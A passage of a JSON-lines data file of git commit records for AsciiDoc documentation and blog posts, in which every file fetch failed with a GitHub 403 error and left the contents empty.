403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3cbc2ba23ac1acb0b48cb080f1a690905c6bbb3b","subject":"Fix broken hyperlink","message":"Fix broken hyperlink\n\nThere is a line break between the URI and the caption of the link. This breaks the link in Asciidoctor and in the Github preview. This commit rearranges the line breaks so that this issue is resolved.","repos":"raphw\/spock,raphw\/spock,spockframework\/spock,siordache\/spock,siordache\/spock,siordache\/spock,raphw\/spock,leonard84\/spock","old_file":"docs\/getting_started.adoc","new_file":"docs\/getting_started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leonard84\/spock.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"72cb6729edc2c8f602723ff10866c91a06521517","subject":"Initial commit","message":"Initial commit\n","repos":"kcrimson\/asciidoctor-reveal.js,kcrimson\/asciidoctor-reveal.js","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kcrimson\/asciidoctor-reveal.js.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aaf521ce4baaf96161b06296539657e08accc05a","subject":"Moving CNV document attributes file into 4.1","message":"Moving CNV document attributes file into 4.1\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/cnv-document-attributes.adoc","new_file":"modules\/cnv-document-attributes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4ab856bbec950a9b0451e67c9f735506a64c9a1","subject":"Update 2015-07-29-Test-posting.adoc","message":"Update 2015-07-29-Test-posting.adoc","repos":"gendalf9\/gendalf9.github.io---hubpress,gendalf9\/gendalf9.github.io---hubpress,gendalf9\/gendalf9.github.io---hubpress","old_file":"_posts\/2015-07-29-Test-posting.adoc","new_file":"_posts\/2015-07-29-Test-posting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gendalf9\/gendalf9.github.io---hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71d82e16a4fa9abd070cb85e209bd3740b2c4721","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e785543d1cda20093ebb5799e6c26f97ab8e98e","subject":"Update 2018-01-15-Configurarando-hosts-virtuales-Apache.adoc","message":"Update 2018-01-15-Configurarando-hosts-virtuales-Apache.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2018-01-15-Configurarando-hosts-virtuales-Apache.adoc","new_file":"_posts\/2018-01-15-Configurarando-hosts-virtuales-Apache.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab5ac93093db9192e7e2e9b67932dc6d34ec351d","subject":"restructure overview for better flow","message":"restructure overview for better flow\n","repos":"EMBL-EBI-SUBS\/subs,EMBL-EBI-SUBS\/subs","old_file":"subs-api\/src\/main\/resources\/docs\/submissions.adoc","new_file":"subs-api\/src\/main\/resources\/docs\/submissions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMBL-EBI-SUBS\/subs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5b8acfa86e2db97eee55098b07c0ef7dc112dc83","subject":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","message":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"994bcc7afcb3de23f720cce09d9c5032f23b3ee0","subject":"Update 2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","message":"Update 2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc0530d9702b5ad7ace353fdb2441abc351bc069","subject":"Update 2016-08-25-Watch-the-Main-Street-Electrical-Parade-Live.adoc","message":"Update 2016-08-25-Watch-the-Main-Street-Electrical-Parade-Live.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-08-25-Watch-the-Main-Street-Electrical-Parade-Live.adoc","new_file":"_posts\/2016-08-25-Watch-the-Main-Street-Electrical-Parade-Live.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6826d20b096a896390a698a50292128d9a58b0ba","subject":"create post 3 Unique Gadgets You Wouldn't Expect To Exist","message":"create post 3 Unique Gadgets You Wouldn't Expect To Exist","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldnt-Expect-To-Exist.adoc","new_file":"_posts\/2018-02-25-3-Unique-Gadgets-You-Wouldnt-Expect-To-Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2f5b29a9c3e70f735b9c01d02061739b53f4dbf","subject":"Update 2016-02-15-Just-some-Pictures-of-the-RaspberryPi-Cluster-Setup.adoc","message":"Update 2016-02-15-Just-some-Pictures-of-the-RaspberryPi-Cluster-Setup.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2016-02-15-Just-some-Pictures-of-the-RaspberryPi-Cluster-Setup.adoc","new_file":"_posts\/2016-02-15-Just-some-Pictures-of-the-RaspberryPi-Cluster-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e27078a23988782b3da411dbbdf6e198f90650d","subject":"Update 2017-12-18-.adoc","message":"Update 2017-12-18-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-18-.adoc","new_file":"_posts\/2017-12-18-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aae17da85bf5b622a904ce047d2469c94cb2cb0d","subject":"Update 2018-02-02-.adoc","message":"Update 2018-02-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-02-.adoc","new_file":"_posts\/2018-02-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68ee8ea09b471800069c9dd96c0b2728df3006a3","subject":"doc: users: add TM example","message":"doc: users: add TM example\n\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,nmorey\/odp,erachmi\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,erachmi\/odp,dkrot\/odp,dkrot\/odp,nmorey\/odp,ravineet-singh\/odp,dkrot\/odp,erachmi\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,erachmi\/odp,nmorey\/odp,dkrot\/odp","old_file":"doc\/users-guide\/users-guide-tm.adoc","new_file":"doc\/users-guide\/users-guide-tm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"c378cd01c1a74039f2e5b6c3358e924154a85706","subject":"Update 2015-12-05-PERT-by-Robert-CMartin.adoc","message":"Update 2015-12-05-PERT-by-Robert-CMartin.adoc","repos":"azubkov\/azubkov.github.io,azubkov\/azubkov.github.io,azubkov\/azubkov.github.io","old_file":"_posts\/2015-12-05-PERT-by-Robert-CMartin.adoc","new_file":"_posts\/2015-12-05-PERT-by-Robert-CMartin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/azubkov\/azubkov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce2d0d0b890d960db867faddfda148a56db771fb","subject":"OGM-285 documentation update","message":"OGM-285 documentation update\n","repos":"DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,Sanne\/hibernate-ogm,gunnarmorling\/hibernate-ogm,gunnarmorling\/hibernate-ogm,jhalliday\/hibernate-ogm,hibernate\/hibernate-ogm,hibernate\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm,mp911de\/hibernate-ogm,jhalliday\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,gunnarmorling\/hibernate-ogm,uugaa\/hibernate-ogm,ZJaffee\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,uugaa\/hibernate-ogm,schernolyas\/hibernate-ogm,Sanne\/hibernate-ogm,ZJaffee\/hibernate-ogm,mp911de\/hibernate-ogm,uugaa\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,tempbottle\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm,tempbottle\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,tempbottle\/hibernate-ogm,emmanuelbernard\/hibernate-ogm,hferentschik\/hibernate-ogm,jhalliday\/hibernate-ogm,schernolyas\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/configuration.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/configuration.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"924349becd6d55ca7290e300f32981e398eb57e5","subject":"Update 2018-09-07-wtf-tu-ne-veux-pas-de-ma-pr.adoc","message":"Update 2018-09-07-wtf-tu-ne-veux-pas-de-ma-pr.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2018-09-07-wtf-tu-ne-veux-pas-de-ma-pr.adoc","new_file":"_posts\/2018-09-07-wtf-tu-ne-veux-pas-de-ma-pr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18f60644466ff7a237066ff5fc57150b44efde58","subject":"Update 2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","message":"Update 2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_file":"_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"385b7f39f5eb602dd90d9aedee0f6147b695c762","subject":"reword manual for depfile\/rspfile escaping change","message":"reword manual for depfile\/rspfile escaping change\n","repos":"drbo\/ninja,mohamed\/ninja,ndsol\/subninja,liukd\/ninja,mgaunard\/ninja,automeka\/ninja,drbo\/ninja,synaptek\/ninja,Maratyszcza\/ninja-pypi,automeka\/ninja,ignatenkobrain\/ninja,liukd\/ninja,dorgonman\/ninja,Qix-\/ninja,rjogrady\/ninja,ctiller\/ninja,bradking\/ninja,atetubou\/ninja,fuchsia-mirror\/third_party-ninja,moroten\/ninja,hnney\/ninja,juntalis\/ninja,ilor\/ninja,automeka\/ninja,drbo\/ninja,mydongistiny\/ninja,syntheticpp\/ninja,nafest\/ninja,mydongistiny\/ninja,atetubou\/ninja,ctiller\/ninja,AoD314\/ninja,ThiagoGarciaAlves\/ninja,metti\/ninja,sxlin\/dist_ninja,synaptek\/ninja,autopulated\/ninja,bradking\/ninja,ndsol\/subninja,maruel\/ninja,drbo\/ninja,ignatenkobrain\/ninja,tfarina\/ninja,bradking\/ninja,bmeurer\/ninja,automeka\/ninja,dendy\/ninja,jimon\/ninja,jendrikillner\/ninja,bmeurer\/ninja,jendrikillner\/ninja,maruel\/ninja,mgaunard\/ninja,jendrikillner\/ninja,ignatenkobrain\/ninja,vvvrrooomm\/ninja,bmeurer\/ninja,nico\/ninja,dendy\/ninja,sgraham\/ninja,sgraham\/ninja,dorgonman\/ninja,moroten\/ninja,guiquanz\/ninja,Maratyszcza\/ninja-pypi,juntalis\/ninja,juntalis\/ninja,ThiagoGarciaAlves\/ninja,rjogrady\/ninja,iwadon\/ninja,syntheticpp\/ninja,sgraham\/ninja,metti\/ninja,Ju2ender\/ninja,lizh06\/ninja,sxlin\/dist_ninja,ilor\/ninja,nicolasdespres\/ninja,metti\/ninja,martine\/ninja,Ju2ender\/ninja,rjogrady\/ninja,ninja-build\/ninja,dorgonman\/ninja,ThiagoGarciaAlves\/ninja,synaptek\/ninja,Maratyszcza\/ninja-pypi,hnney\/ninja,sgraham\/ninja,sxlin\/dist_ninja,iwadon\/ninja,tfarina\/ninja,maruel\/ninja,vvvrrooomm\/ninja,nicolasdespres\/ninja,AoD314\/ninja,nafest\/ninja,jimon\/ninja,kissthink\/ninja,ndsol\/subninja,sxlin\/dist_ninja,ignatenkobrain\/ninja,iwadon\/ninja,Ju2ender\/ninja,vvvrrooomm\/ninja,mgaunard\/ninja,ndsol\/subninja,jimon\/ninja,synaptek\/ninja,moroten\/ninja,colincross\/ninja,mydongistiny\/ninja,nicolasdespres\/ninja,nafest\/ninja,Qix-\/ninja,autopulated\/ninja,dendy\/ninja,atetubou\/ninja,kissthink\/ninja,martine\/ninja,guiquanz\/ninja,AoD314\/ninja,mgaunard\/ninja,nafest\/ninja,fuchsia-mirror\/third_party-ninja,juntalis\/ninja,iwadon\/ninja,nico\/ninja,atetubou\/ninja,sxlin\/dist_ninja,bmeurer\/ninja,maruel\/ninja,nicolasdespres\/ninja,tfarina\/ninja,colincross\/ninja,vvvrrooomm\/ninja,ninja-build\/ninja,ilor\/ninja,autopulated\/ninja,hnney\/ninja,liukd\/ninja,nico\/ninja,autopulated\/ninja,rjogrady\/ninja,tfarina\/ninja,guiquanz\/ninja,ctiller\/ninja,jimon\/ninja,lizh06\/ninja,metti\/ninja,martine\/ninja,Maratyszcza\/ninja-pypi,syntheticpp\/ninja,sxlin\/dist_ninja,ninja-build\/ninja,Qix-\/ninja,fuchsia-mirror\/third_party-ninja,jendrikillner\/ninja,AoD314\/ninja,mohamed\/ninja,liukd\/ninja,dendy\/ninja,ctiller\/ninja,bradking\/ninja,Ju2ender\/ninja,kissthink\/ninja,colincross\/ninja,nico\/ninja,dorgonman\/ninja,colincross\/ninja,Qix-\/ninja,moroten\/ninja,lizh06\/ninja,ThiagoGarciaAlves\/ninja,ninja-build\/ninja,sxlin\/dist_ninja,ilor\/ninja,hnney\/ninja,mohamed\/ninja,kissthink\/ninja,mohamed\/ninja,syntheticpp\/ninja,guiquanz\/ninja,lizh06\/ninja,fuchsia-mirror\/third_party-ninja,martine\/ninja,mydongistiny\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nafest\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"29ea954eb78eea458cbd1aa4d75652358abe0139","subject":"how to install and be ready to use Reflect 2","message":"how to install and be ready to use Reflect 2\n","repos":"llaville\/php-reflect,remicollet\/php-reflect","old_file":"docs\/setup.asciidoc","new_file":"docs\/setup.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remicollet\/php-reflect.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"999f045b679e8e434dd9652c36c9472e5c7f7e0f","subject":"Update 2017-09-19-zapier-Google-Trello.adoc","message":"Update 2017-09-19-zapier-Google-Trello.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-19-zapier-Google-Trello.adoc","new_file":"_posts\/2017-09-19-zapier-Google-Trello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d66823d625786e3c545fe8200baeaa8df55567f","subject":"Basic documentation for zookeeper discovery","message":"Basic documentation for zookeeper discovery\n\nfixes gh-8\n","repos":"4finance\/spring-cloud-zookeeper,4finance\/spring-cloud-zookeeper,marcingrzejszczak\/spring-cloud-zookeeper,marcingrzejszczak\/spring-cloud-zookeeper,spring-cloud\/spring-cloud-zookeeper,spring-cloud\/spring-cloud-zookeeper","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-zookeeper.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-zookeeper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-zookeeper.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dacd084f93e9b0167c331a76d4bc1293917ed816","subject":"Update 2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","message":"Update 2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_file":"_posts\/2018-03-22-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-B-G-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7139e8b121e33268ed2ad7170fa299085a71a65","subject":"Write the dev mode guide, includes IDE import","message":"Write the dev mode guide, includes IDE import\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/ide-configuration.adoc","new_file":"docs\/src\/main\/asciidoc\/ide-configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6cc4d98739ec46949e1c760b6c2ef00a6139451","subject":"refs kato \u4e0d\u8981\u306a\u8a18\u4e8b\u524a\u9664","message":"refs kato \u4e0d\u8981\u306a\u8a18\u4e8b\u524a\u9664\n","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-16-google-analytics-with-google-app-script.adoc","new_file":"_posts\/2016-04-16-google-analytics-with-google-app-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de7bc3c34cc768915d3149be21720a3b5c50a9fe","subject":"Create 2016-04-22-Presenting-Git-Hub-Pull-Request-Builder.adoc","message":"Create 2016-04-22-Presenting-Git-Hub-Pull-Request-Builder.adoc","repos":"yaks-all-the-way-down\/yaks-all-the-way-down.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io","old_file":"_posts\/2016-04-22-Presenting-Git-Hub-Pull-Request-Builder.adoc","new_file":"_posts\/2016-04-22-Presenting-Git-Hub-Pull-Request-Builder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yaks-all-the-way-down\/yaks-all-the-way-down.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1303de5dd46cefa3ff443d98b2ac9e584b6bd607","subject":"Update 2016-09-13-Encrypted-Hetzner-Server.adoc","message":"Update 2016-09-13-Encrypted-Hetzner-Server.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc","new_file":"_posts\/2016-09-13-Encrypted-Hetzner-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fac5cc74cc3b4a50df9ca7f64ae50bca525f0ad2","subject":"Update 2016-04-01-Ill-find-you.adoc","message":"Update 2016-04-01-Ill-find-you.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af4d023603460d27293c0b1f57e85af164dd3b4d","subject":"Update 2017-06-13-Kleine-Fabel.adoc","message":"Update 2017-06-13-Kleine-Fabel.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-06-13-Kleine-Fabel.adoc","new_file":"_posts\/2017-06-13-Kleine-Fabel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edb5c412619ed7aaabb9d86749ae0567559e7695","subject":"Update 2013-03-19-The-Secret-of-Monkey-Island-dans-le-navigateur.adoc","message":"Update 2013-03-19-The-Secret-of-Monkey-Island-dans-le-navigateur.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2013-03-19-The-Secret-of-Monkey-Island-dans-le-navigateur.adoc","new_file":"_posts\/2013-03-19-The-Secret-of-Monkey-Island-dans-le-navigateur.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54f94ec2841976c96ea31280e3c65f08c55860d0","subject":"Update 2016-05-22-First.adoc","message":"Update 2016-05-22-First.adoc","repos":"ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io","old_file":"_posts\/2016-05-22-First.adoc","new_file":"_posts\/2016-05-22-First.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ioisup\/ioisup.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2180817cfacfb840882f80aceb045ad2137ce8c1","subject":"Update 2016-11-24-G-A-S.adoc","message":"Update 2016-11-24-G-A-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-24-G-A-S.adoc","new_file":"_posts\/2016-11-24-G-A-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4da4563283a13a6990960cfd394a0dd255ecc5df","subject":"Update 2017-08-04-mecab.adoc","message":"Update 2017-08-04-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-04-mecab.adoc","new_file":"_posts\/2017-08-04-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf3bfd22e71aefaad1c10fb62e674fd4bb2487c5","subject":"Update 2016-02-13-First-post-on-hubpress.adoc","message":"Update 2016-02-13-First-post-on-hubpress.adoc","repos":"mikqi\/blog,mikqi\/blog,mikqi\/blog,mikqi\/blog","old_file":"_posts\/2016-02-13-First-post-on-hubpress.adoc","new_file":"_posts\/2016-02-13-First-post-on-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikqi\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7c32395c50d74758a54eba28d81bd3b93d2ff45","subject":"Update 2017-01-13-vue.adoc","message":"Update 